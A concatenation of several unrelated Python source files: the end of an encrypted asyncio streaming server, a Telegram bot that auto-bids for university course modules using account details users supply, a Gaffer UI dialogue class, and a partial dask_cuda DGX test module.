# key = cv2.waitKey(1) & 0xFF
# if key ==ord('q') or not stream:
# # client_socket.close()
# break
except KeyboardInterrupt:
client_logger.info("Client Task was canceled")
stream = False
loop.stop()
except asyncio.TimeoutError:
client_logger.info('Client Timed out')
except ConnectionResetError:
client_logger.info('Client left unexpectedly')
finally:
writer.close()
client_logger.info('Connection Closed')
async def boot_server(host_ip, port):
server = await asyncio.start_server(new_client, port=port, host=host_ip)
# async with server:
await server.serve_forever()
def str2bool(arg):
if isinstance(arg, bool):
return arg
if arg.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif arg.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError("Boolean value expected:\n\t'yes', 'true', 't', 'y', '1', 'no', 'false', 'f', 'n', '0'") # noqa: E501
if __name__ == '__main__':
# Setup Logging
main_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "Message":"%(message)s"}' # noqa: E501
main_logger = logging.getLogger("main")
main_logger_ch = logging.StreamHandler()
main_formatter = logging.Formatter(main_logger_Format)
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
client_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "ClientIP":"%(clientip)s", "ClientPort":"%(clientport)s", "Message":"%(message)s"}' # noqa: E501
client_logger = logging.getLogger("client")
client_logger_ch = logging.StreamHandler()
client_formatter = logging.Formatter(client_logger_Format)
client_logger.setLevel(logging.WARNING)
client_logger_ch.setLevel(logging.WARNING)
# Handle arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--host-ip", type=str, required=False,
help="ip address to serve on, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("-p", "--port", type=int, required=False,
help="port number to listen to, default: 9898", default=9898)
ap.add_argument("--pki-host-ip", type=str, required=False,
help="ip address of the PKI server to connect to, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("--pki-port", type=int, required=False,
help="PKI port number to connect to, default: 7777", default=7777)
ap.add_argument("--rsa-pub-key", type=str, required=False,
help="Path to RSA PEM public key, default: env/keys/server/public-key.pem",
default='env/keys/server/public-key.pem')
ap.add_argument("--rsa-priv-key", type=str, required=False,
help="Path to RSA PEM private key, default: env/keys/server/private-key.pem",
default='env/keys/server/private-key.pem')
ap.add_argument("--disable-ecdh", type=str2bool, required=False,
help="Disable Elliptic Curve key generation for Diffie-Hellman Key Exchange, default: False",
default=False)
ap.add_argument("--restricted", type=str2bool, required=False,
help="Enable restricted mode, requires --whitelist argument, default: False", default=False)
ap.add_argument("--whitelist", type=str, required=False,
help="Path to folder containing trusted public keys, default: env/keys/server/trusted_keys",
default="env/keys/server/trusted_keys")
ap.add_argument("-l", "--log-level", type=str, required=False,
help="Level of logging: info, debug, warning, error, default: warning", default='warning')
args = vars(ap.parse_args())
if (args["log_level"].lower() not in ["info", "warning", "debug", "error"]):
ap.error('Unexpected log level entered. Valid choices are: info, error, warning, debug')
if args["log_level"].lower() == "info":
main_logger.setLevel(logging.INFO)
main_logger_ch.setLevel(logging.INFO)
client_logger.setLevel(logging.INFO)
client_logger_ch.setLevel(logging.INFO)
elif args["log_level"].lower() == "warning":
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
client_logger.setLevel(logging.WARNING)
client_logger_ch.setLevel(logging.WARNING)
elif args["log_level"].lower() == "debug":
main_logger.setLevel(logging.DEBUG)
main_logger_ch.setLevel(logging.DEBUG)
client_logger.setLevel(logging.DEBUG)
client_logger_ch.setLevel(logging.DEBUG)
elif args["log_level"].lower() == "error":
main_logger.setLevel(logging.ERROR)
main_logger_ch.setLevel(logging.ERROR)
client_logger.setLevel(logging.ERROR)
client_logger_ch.setLevel(logging.ERROR)
main_logger_ch.setFormatter(main_formatter)
main_logger.addHandler(main_logger_ch)
client_logger_ch.setFormatter(client_formatter)
client_logger.addHandler(client_logger_ch)
if (args["restricted"] and args["whitelist"] == "env/keys/server/trusted_keys"):
main_logger.warning('The --restricted argument is being run with the default whitelist')
restricted = args["restricted"]
if args["restricted"]:
main_logger.info("Server is running in restricted mode, setting up whitelist...")
# For every file in whitelist directory
filenames = [f for f in os.listdir(args["whitelist"]) if os.path.isfile(os.path.join(args["whitelist"], f))]
# Load the public key and add it to whitelist
for pubkfile in filenames:
RSA_trusted_client_public_key = None
with open(os.path.join(args["whitelist"], pubkfile), "rb") as key_file:
RSA_trusted_client_public_key = load_pem_public_key(
key_file.read()
)
serialized_RSA_trusted_client_public_key = RSA_trusted_client_public_key.public_bytes(Encoding.PEM,
PublicFormat.SubjectPublicKeyInfo) # noqa: E501
trusted_keys_whitelist[serialized_RSA_trusted_client_public_key] = "Trusted"
main_logger.info(f"{len(trusted_keys_whitelist)} Public Key(s) loaded into whitelist")
main_logger.debug(f"trusted_keys_whitelist = {trusted_keys_whitelist}")
disable_ecdh = args["disable_ecdh"]
if disable_ecdh:
main_logger.info("ECDH is disabled, using DSA keys with Diffie-Hellman")
else:
main_logger.info("Using ECDH for key exchange")
RSA_server_public_key = None
RSA_server_private_key = None
with open(args["rsa_pub_key"], "rb") as key_file:
RSA_server_public_key = load_pem_public_key(
key_file.read()
)
with open(args["rsa_priv_key"], "rb") as key_file:
RSA_server_private_key = load_pem_private_key(
key_file.read(),
password=None,
)
# Serialize keys
serialized_RSA_server_public_key = RSA_server_public_key.public_bytes(Encoding.PEM,
PublicFormat.SubjectPublicKeyInfo)
# ## --------- PKI Register Pub Keys START-----------##
# pki_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# pki_host_ip = args["pki_host_ip"]
# pki_port = args["pki_port"]
# pki_client_socket.connect((pki_host_ip,pki_port))
# response = registerPublicKey(pki_client_socket, serialized_RSA_server_public_key, RSA_server_private_key)
# print("response:", response)
# pki_client_socket.close()
# ## --------- PKI Register Pub Keys END -----------##
main_logger.info("Setting up server...")
host_ip = args["host_ip"]
port = args["port"]
socket_address = (host_ip, port)
cap_frame_thread = threading.Thread(target=capture_frames, args=(), name='capture_frames', daemon=False)
cap_frame_thread.start()
threads = []
main_logger.info(f"LISTENING AT: {socket_address}")
loop = asyncio.get_event_loop()
loop.create_task(boot_server(host_ip, port))
try:
loop.run_forever()
except KeyboardInterrupt:
main_logger.info("Server is manually shutting down")
stream = False
cap_frame_thread.join()
finally:
main_logger.info("Shutting Down Server")
# try:
# loop.stop()
# loop.run_until_complete(loop.shutdown_asyncgens())
# try:
# # loop.stop()
# pending = asyncio.all_tasks()
# for task in penging:
# task.cancel()
# with suppress(asyncio.CancelledError):
# loop.run_until_complete(task)
# # loop.stop()
# # loop.run_until_complete(loop.shutdown_asyncgens())
# try:
# loop.stop()
# pending = asyncio.all_tasks()
# loop.run_until_complete(asyncio.gather(*pending))
try:
loop.stop()
pending = asyncio.all_tasks()
for task in pending:
task.cancel()
main_logger.debug("Lagging client task has been cancelled")
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
# loop.run_until_complete(asyncio.gather(*pending))
except RuntimeError as e:
if e.args[0] == 'no running event loop':
main_logger.debug("All Client Connections have been closed already")
pass
else:
raise e
|
bot.py
|
from telepot.loop import MessageLoop
import telepot
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
import time
from threading import Thread
from ActivateSelenium import bid
from key import token
activeUsers = {}
timeslots = {}
input_format = "%d/%m/%Y %H:%M"
precise_format = "%d/%m/%Y %H:%M:%S.0"
MAX_USERS = 2
class User:
def __init__(self):
self.state = 1
self.username = None
self.password = None
self.time = None
self.plan = "1"
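# Conversation state machine per user:
# 1 -> waiting for a timeslot, 2 -> waiting for username, 2.1 -> waiting for password,
# 2.2 -> waiting for plan number (1-3), 3 -> fully registered, waiting for the bid to run.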
def handle(msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if content_type == 'text':
if msg['text'] == '/about':
bot.sendMessage(chat_id, "This bot only stores your account details till it bids for you and they will be deleted afterwards. " \
"Your details will not be made known to anyone, including the person who made me (he is quite ethical). " \
"Only 2 people are able to use this bot to bid for modules at any timeslot. " \
"Please ensure that you have already planned out your modules on STARS Planner. " \
"Note that this bot does not guarantee a 100% success rate. " \
"To start, type '/bid'")
elif msg['text'] == '/bid' and (chat_id not in activeUsers):
activeUsers[chat_id] = User()
bot.sendMessage(chat_id, "Please key in your timeslot in this format DD/MM/YYYY HH:MM")
elif chat_id in activeUsers:
if msg['text'] == '/cancel':
bot.sendMessage(chat_id, "Cancelled. Please restart the process with '/bid'")
cleanUp(chat_id)
elif msg['text'] == '/edit' and activeUsers[chat_id].state > 1:
cleanUp(chat_id)
activeUsers[chat_id] = User()
bot.sendMessage(chat_id, "Please key in your timeslot in this format DD/MM/YYYY HH:MM")
elif activeUsers[chat_id].state == 1:
getTimeslot(chat_id, msg['text'])
elif activeUsers[chat_id].state == 2 or activeUsers[chat_id].state == 2.1 or activeUsers[chat_id].state == 2.2:
getAccountDetails(chat_id, msg['text'])
elif msg['text'] == '/edit' and activeUsers[chat_id].state == 3:
bot.sendMessage(chat_id, "Please give me your username")
activeUsers[chat_id].state = 2
else:
bot.sendMessage(chat_id, "Use '/bid' to start")
def getTimeslot(chat_id, text):
if checkText(text): # if valid
precise_dt = datetime.strptime(text, input_format).strftime(precise_format) #change M to MM and add Seconds and ms precision
if precise_dt in timeslots:
if len(timeslots[precise_dt]) == MAX_USERS:
bot.sendMessage(chat_id, "Your selected timeslot is full. Please restart the process with '/bid'")
del activeUsers[chat_id]
else:
timeslots[precise_dt].append(chat_id)
activeUsers[chat_id].state = 2
activeUsers[chat_id].time = precise_dt
bot.sendMessage(chat_id, "Please give me your username")
else: # if not in dict of timeslots
timeslots[precise_dt] = [chat_id]
activeUsers[chat_id].state = 2
activeUsers[chat_id].time = precise_dt
bot.sendMessage(chat_id, "Please give me your username")
else:
bot.sendMessage(chat_id, "Please follow the input format DD/MM/YYYY HH:MM") #if invalid
def checkText(text):
try:
datetime.strptime(text, input_format)
return True
except ValueError:
return False
def getAccountDetails(chat_id, text):
if activeUsers[chat_id].state == 2:
activeUsers[chat_id].username = text
bot.sendMessage(chat_id, "Please give me your password")
activeUsers[chat_id].state = 2.1
elif activeUsers[chat_id].state == 2.1:
activeUsers[chat_id].password = text
bot.sendMessage(chat_id, "Which Plan should I bid for?")
activeUsers[chat_id].state = 2.2
elif activeUsers[chat_id].state == 2.2:
if text.isnumeric() and (int(text)<= 3 and int(text)>=1):
activeUsers[chat_id].plan = text
bot.sendMessage(chat_id, "Got it. I will notify you when it is done")
activeUsers[chat_id].state = 3
else:
bot.sendMessage(chat_id, "Please input a number from 1 to 3")
def cleanUp(chat_id):
target_time = activeUsers[chat_id].time
target_index = timeslots[target_time].index(chat_id)
del timeslots[target_time][target_index]
if len(timeslots[target_time]) == 0:
del timeslots[target_time]
del activeUsers[chat_id]
def getUsersAtTimeslot(time):
chat_ids = timeslots[time]
users = []
for chat_id in chat_ids:
users.append(activeUsers[chat_id])
return chat_ids, users
def finishBid(chat_ids, messages, look_ahead, flags):
for index in range(len(chat_ids)):
if not flags[index]:
bot.sendMessage(chat_ids[index], messages[index][messages[index].find("{")+1:-1])
else:
soup = BeautifulSoup(messages[index], 'html.parser').find("div", {"id": "ui_body_container"})
# 1st message
tr_list = soup.find_all('tr')[2:-1]
td_list = []
for el in tr_list:
td_list.append(str(el.find_all('td')))
for el in td_list:
text = el.split('\n')
new_text = []
for i in text:
if i[0] != "<" and i[-1]!=">":
new_text.append(i)
new_text[0] = "Index: "+new_text[0]+","
new_text[1] = "Course: "+new_text[1]+","
new_text[2] = "Title: "+new_text[2]+","
new_text[3] = "AUs: "+new_text[3]+","
new_text[4] = "Type: "+new_text[4]+","
new_text[5] = "Choice: "+new_text[5]+","
new_text.append(text[-2])
new_text[6] = "Remark: "+new_text[6]
bot.sendMessage(chat_ids[index], " ".join(new_text))
# 2nd message
last_row = soup.find_all('tr')[-1].text.split("\n")
new_last_row = []
for el in last_row:
if el != '' and el != '\xa0':
new_last_row.append(el)
del last_row
new_last_row = new_last_row[1:]
new_last_row[0] = new_last_row[0]+","
new_last_row[-1] = "Total AUs: "+new_last_row[-1]
bot.sendMessage(chat_ids[index], " ".join(new_last_row))
del activeUsers[chat_ids[index]]
del timeslots[look_ahead]
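# The main loop below polls every 0.1 s; 25 seconds before a registered timeslot it
# spawns one bid thread per user, waits for them, and reports the results via finishBid.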
if __name__ == "__main__":
bot = telepot.Bot(token)
MessageLoop(bot, handle).run_as_thread()
print("Listening ...")
while 1:
look_ahead = (datetime.now()+timedelta(seconds=25)).strftime(precise_format) # 25 seconds before target time
if look_ahead in timeslots:
chat_ids, users = getUsersAtTimeslot(look_ahead)
threads = [None]*MAX_USERS
messages = ["error"]*MAX_USERS
flags = [None]*MAX_USERS
for i in range(len(chat_ids)):
threads[i] = Thread(target=bid(users[i], look_ahead, messages, flags, i))
threads[i].start()
finishBid(chat_ids, messages, look_ahead, flags)
del threads, messages, flags
time.sleep(0.1)
|
OpDialogue.py
|
##########################################################################
#
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import sys
import threading
import traceback
import imath
import IECore
import Gaffer
import GafferUI
import GafferCortex
## A dialogue which allows a user to edit the parameters of an
# IECore.Op instance and then execute it.
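# Typical usage (a sketch, assuming an existing IECore.Op instance `myOp`) :
#
# dialogue = OpDialogue( myOp )
# result = dialogue.waitForResult() # None if the user cancelled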
class OpDialogue( GafferUI.Dialogue ) :
## Defines what happens when the op has been successfully executed :
#
# FromUserData : Get behaviour from ["UI"]["postExecuteBehaviour"] userData, which should
# contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to DisplayResult.
#
# None : Do nothing. The dialogue returns to the parameter editing state.
#
# Close : The dialogue is closed immediately.
#
# DisplayResult : The result is displayed, with a button for returning to the parameter editing state.
#
# DisplayResultAndClose : The result is displayed, with a button for closing the dialogue.
#
# NoneByDefault : deprecated - the same as DisplayResult
# CloseByDefault : deprecated - the same as DisplayResult
PostExecuteBehaviour = IECore.Enum.create( "FromUserData", "None_", "Close", "DisplayResult", "DisplayResultAndClose", "NoneByDefault", "CloseByDefault" )
## Defines which button has the focus when the op is displayed for editing.
#
# FromUserData : Gets the default button from ["UI"]["defaultButton"] userData, which
# should contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to OK.
#
# None : Neither button has the focus.
#
# OK : The OK button has the focus.
#
# Cancel : The cancel button has the focus.
DefaultButton = IECore.Enum.create( "FromUserData", "None_", "OK", "Cancel" )
# If executeInBackground is True, then the Op will be executed on another
# thread, allowing the UI to remain responsive during execution. This is
# the preferred method of operation, but it is currently not the default
# in case certain clients are relying on running the Op on the main thread.
def __init__(
self,
opInstanceOrOpHolderInstance,
title=None,
sizeMode=GafferUI.Window.SizeMode.Manual,
postExecuteBehaviour = PostExecuteBehaviour.FromUserData,
executeInBackground = False,
defaultButton = DefaultButton.FromUserData,
executeImmediately = False,
**kw
) :
# sort out our op and op holder
if isinstance( opInstanceOrOpHolderInstance, IECore.Op ) :
opInstance = opInstanceOrOpHolderInstance
self.__node = GafferCortex.ParameterisedHolderNode()
self.__node.setParameterised( opInstance )
# set the current plug values as userDefaults to provide
# a clean NodeUI based on the initial settings of the Op.
# we assume that if an OpHolder was passed directly then
# the metadata has already been setup as preferred.
self.__setUserDefaults( self.__node )
else :
self.__node = opInstanceOrOpHolderInstance
opInstance = self.__node.getParameterised()[0]
# initialise the dialogue
if title is None :
title = IECore.CamelCase.toSpaced( opInstance.typeName() )
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
# decide what we'll do after execution.
if postExecuteBehaviour == self.PostExecuteBehaviour.FromUserData :
postExecuteBehaviour = self.PostExecuteBehaviour.DisplayResult
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["postExecuteBehaviour"]
if d is not None :
for v in self.PostExecuteBehaviour.values() :
if str( v ).lower() == d.value.lower() :
postExecuteBehaviour = v
break
else :
# backwards compatibility with batata
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["closeAfterExecution"]
if d is not None :
postExecuteBehaviour = self.PostExecuteBehaviour.Close if d.value else self.PostExecuteBehaviour.DisplayResult
self.__postExecuteBehaviour = postExecuteBehaviour
self.__executeInBackground = executeInBackground
self.__defaultButton = defaultButton
# make a frame to contain our main ui element. this will
# contain different elements depending on our state.
self.__frame = GafferUI.Frame()
self._setWidget( self.__frame )
# get the ui for the op - we'll use this when we want
# the user to edit parameters.
self.__parameterEditingUI = GafferUI.NodeUI.create( self.__node )
# build a ui element for progress feedback and suchlike.
# we'll use this when executing and displaying the result.
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as self.__progressUI :
GafferUI.Spacer( imath.V2i( 1 ), parenting = { "expand" : True } )
self.__progressIconFrame = GafferUI.Frame(
borderStyle = GafferUI.Frame.BorderStyle.None_,
parenting = {
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center
}
)
self.__progressLabel = GafferUI.Label(
parenting = {
"expand" : True,
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center,
}
)
GafferUI.Spacer( imath.V2i( 250, 1 ), parenting = { "expand" : True } )
with GafferUI.Collapsible( "Details", collapsed = True ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget()
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleStateChangedConnection = self.__messageCollapsible.stateChangedSignal().connect(
Gaffer.WeakMethod( self.__messageCollapsibleStateChanged )
)
# add buttons. our buttons mean different things depending on our current state,
# but they equate roughly to going forwards or going backwards.
self.__backButton = self._addButton( "Back" )
self.__forwardButton = self._addButton( "Forward" )
self.__preExecuteSignal = GafferUI.WidgetSignal()
self.__postExecuteSignal = Gaffer.Signal2()
self.__opExecutedSignal = Gaffer.Signal1()
self.__haveResizedToFitParameters = False
if executeImmediately :
self.__initiateExecution()
else :
self.__initiateParameterEditing()
## Returns the ParameterisedHolder used to store the Op.
# This may be used to edit parameter values.
def parameterisedHolder( self ) :
return self.__node
## Signal emitted before executing the Op.
# Slots should have the signature `bool slot( opDialogue )`,
# and may return True to cancel execution, or False to
# allow it to continue.
def preExecuteSignal( self ) :
return self.__preExecuteSignal
## Signal emitted after executing the Op.
# Slots should have the signature `slot( opDialogue, result )`.
def postExecuteSignal( self ) :
return self.__postExecuteSignal
## A signal called when the user has pressed the execute button
# and the Op has been successfully executed. This is passed the
# result of the execution.
## \deprecated Use postExecuteSignal() instead.
def opExecutedSignal( self ) :
return self.__opExecutedSignal
## Returns the internal MessageWidget used for displaying messages
# output by the Op.
def messageWidget( self ) :
return self.__messageWidget
## Causes the dialogue to enter a modal state, returning the result
# of executing the Op, or None if the user cancelled the operation. Any
# validation or execution errors will be reported to the user and return
# to the dialogue for them to cancel or try again.
def waitForResult( self, **kw ) :
self.__resultOfWait = None
self.setModal( True, **kw ) # will return when the dialogue is closed
return self.__resultOfWait
def _acceptsClose( self ) :
# we mustn't allow the window to be closed while
# the op is running in the background.
return self.__state != self.__State.Execution
__State = IECore.Enum.create( "ParameterEditing", "Execution", "ErrorDisplay", "ResultDisplay" )
def __initiateParameterEditing( self, *unused ) :
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__close ) )
executeLabel = "OK"
with IECore.IgnoredExceptions( KeyError ) :
executeLabel = self.__node.getParameterised()[0].userData()["UI"]["buttonLabel"].value
self.__forwardButton.setText( executeLabel )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateExecution ) )
self.__frame.setChild( self.__parameterEditingUI )
self.__focusDefaultButton()
self.__state = self.__State.ParameterEditing
# when we first display our parameters, we want to ensure that the window
# is big enough to fit them nicely. we don't do this the next time we show
# the parameters, because the user may have deliberately resized the window.
if not self.__haveResizedToFitParameters :
self.resizeToFitChild( shrink = False )
self.__haveResizedToFitParameters = True
def __close( self, *unused ) :
self.__state = self.__State.ParameterEditing
self.close()
def __initiateExecution( self, *unused ) :
if self.preExecuteSignal()( self ) :
return
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Processing...</h3>" )
self.__backButton.setEnabled( False )
self.__backButton.setText( "Cancel" )
self.__forwardButton.setVisible( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self.__state = self.__State.Execution
if self.__executeInBackground :
self.__frame.setChild( self.__progressUI )
threading.Thread( target = self.__execute ).start()
else :
# we don't display progress when we're not threaded,
# because we have no way of updating it.
self.__execute()
def __execute( self ) :
try :
self.__node.setParameterisedValues()
with self.__messageWidget.messageHandler() :
result = self.__node.getParameterised()[0]()
except Exception as e :
result = sys.exc_info()
if self.__executeInBackground :
GafferUI.EventLoop.executeOnUIThread( IECore.curry( self.__finishExecution, result ) )
else :
# We're being called on the main gui thread, most likely from a button click on
# the forward button. If we called __finishExecution() immediately, it would add
# new slots to the button click signal, and these would be executed immediately
# for the _current_ click - this is not what we want! So we defer __finishExecution
# to the next idle event, when the current click is a thing of the past.
## \todo The documentation for boost::signals2 seems to imply that it has a different
# behaviour, and that slots added during signal emission are ignored until the next
# emission. If we move to using signals2, we may be able to revert this change.
GafferUI.EventLoop.addIdleCallback( IECore.curry( self.__finishExecution, result ) )
def __finishExecution( self, result ) :
if isinstance( result, IECore.Object ) :
if self.getModal() :
self.__resultOfWait = result
self.__initiateResultDisplay( result )
self.opExecutedSignal()( result )
self.postExecuteSignal()( self, result )
else :
self.__initiateErrorDisplay( result )
return False # remove idle callback
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "failure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__backButton.setVisible( True )
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setVisible( True )
self.__forwardButton.setText( "Retry" )
self.__forwardButton.setEnabled( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Executing {opName}".format( opName=self.__node.getParameterised()[0].typeName() ),
str( exceptionInfo[1] ),
)
self.__frame.setChild( self.__progressUI )
self.__forwardButton._qtWidget().setFocus()
self.__state = self.__State.ErrorDisplay
def __initiateResultDisplay( self, result ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages the Op emitted - check for those.
problems = []
for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems :
# If there were no problems, then our post execute behaviour may
# indicate that we don't need to display anything - deal with
# those cases.
if self.__postExecuteBehaviour == self.PostExecuteBehaviour.Close :
self.__close()
return
elif self.__postExecuteBehaviour == self.PostExecuteBehaviour.None_ :
self.__initiateParameterEditing()
return
# Either the post execute behaviour says we should display the result, or we're
# going to anyway, because we don't want the problems to go unnoticed.
self.__progressIconFrame.setChild(
GafferUI.Image( "successWarning.png" if problems else "success.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Info, "Result", str( result ) )
self.__backButton.setText( "Close" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setText( "Again!" )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
if self.__postExecuteBehaviour in ( self.PostExecuteBehaviour.DisplayResultAndClose, self.PostExecuteBehaviour.Close ) :
self.__forwardButton.setVisible( False )
self.__frame.setChild( self.__progressUI )
self.__backButton._qtWidget().setFocus()
self.__state = self.__State.ResultDisplay
def __focusDefaultButton( self ) :
defaultButton = self.__defaultButton
if defaultButton == self.DefaultButton.FromUserData :
defaultButton = self.DefaultButton.OK
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = self.__node.getParameterised()[0].userData()["UI"]["defaultButton"]
if d is not None :
for v in self.DefaultButton.values() :
if str( v ).lower() == d.value.lower() :
defaultButton = v
break
if defaultButton == self.DefaultButton.None_ :
self._qtWidget().setFocus()
elif defaultButton == self.DefaultButton.Cancel :
self.__backButton._qtWidget().setFocus()
else :
self.__forwardButton._qtWidget().setFocus()
def __messageCollapsibleStateChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleStateChangedConnection = None
def __setUserDefaults( self, graphComponent ) :
if isinstance( graphComponent, Gaffer.Plug ) and hasattr( graphComponent, "getValue" ) :
with IECore.IgnoredExceptions( Exception ) :
Gaffer.Metadata.registerValue( graphComponent, "userDefault", graphComponent.getValue() )
for child in graphComponent.children() :
self.__setUserDefaults( child )
|
test_dgx.py
|
import multiprocessing as mp
import os
import dask.array as da
from dask_cuda import DGX
from distributed import Client
import numpy
import pytest
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
psutil = pytest.importorskip("psutil")
def _check_dgx_version():
dgx_server = None
if not os.path.isfile("/etc/dgx-release"):
return dgx_server
for line in open("/etc/dgx-release"):
if line.startswith("DGX_PLATFORM"):
if "DGX Server for DGX-1" in line:
dgx_server = 1
elif "DGX Server for DGX-2" in line:
dgx_server = 2
break
return dgx_server
if _check_dgx_version() is None:
pytest.skip("Not a DGX server", allow_module_level=True)
# Note: each of the following tests is executed in a new process so
# that the UCX options of the different tests don't conflict.
# Furthermore, all tests do some computation to trigger initialization
# of UCX before retrieving the current config.
def _test_default():
with DGX() as cluster:
with Client(cluster):
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def test_default():
p = mp.Process(target=_test_default)
p.start()
p.join()
assert not p.exitcode
def _test_tcp_over_ucx():
with DGX(enable_tcp_over_ucx=True) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
return True
assert all(client.run(check_ucx_options).values())
def test_tcp_over_ucx():
p = mp.Process(target=_test_tcp_over_ucx)
p.start()
p.join()
assert not p.exitcode
def _test_tcp_only():
with DGX(protocol="tcp") as cluster:
with Client(cluster):
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def test_tcp_only():
p = mp.Process(target=_test_tcp_only)
p.start()
p.join()
assert not p.exitcode
def _test_ucx_infiniband_nvlink(enable_infiniband, enable_nvlink):
cupy = pytest.importorskip("cupy")
if _check_dgx_version() == 1:
net_devices = [
"mlx5_0:1",
"mlx5_0:1",
"mlx5_1:1",
"mlx5_1:1",
"mlx5_2:1",
"mlx5_2:1",
"mlx5_3:1",
"mlx5_3:1",
]
elif _check_dgx_version() == 2:
net_devices = [
"mlx5_0:1",
"mlx5_0:1",
"mlx5_1:1",
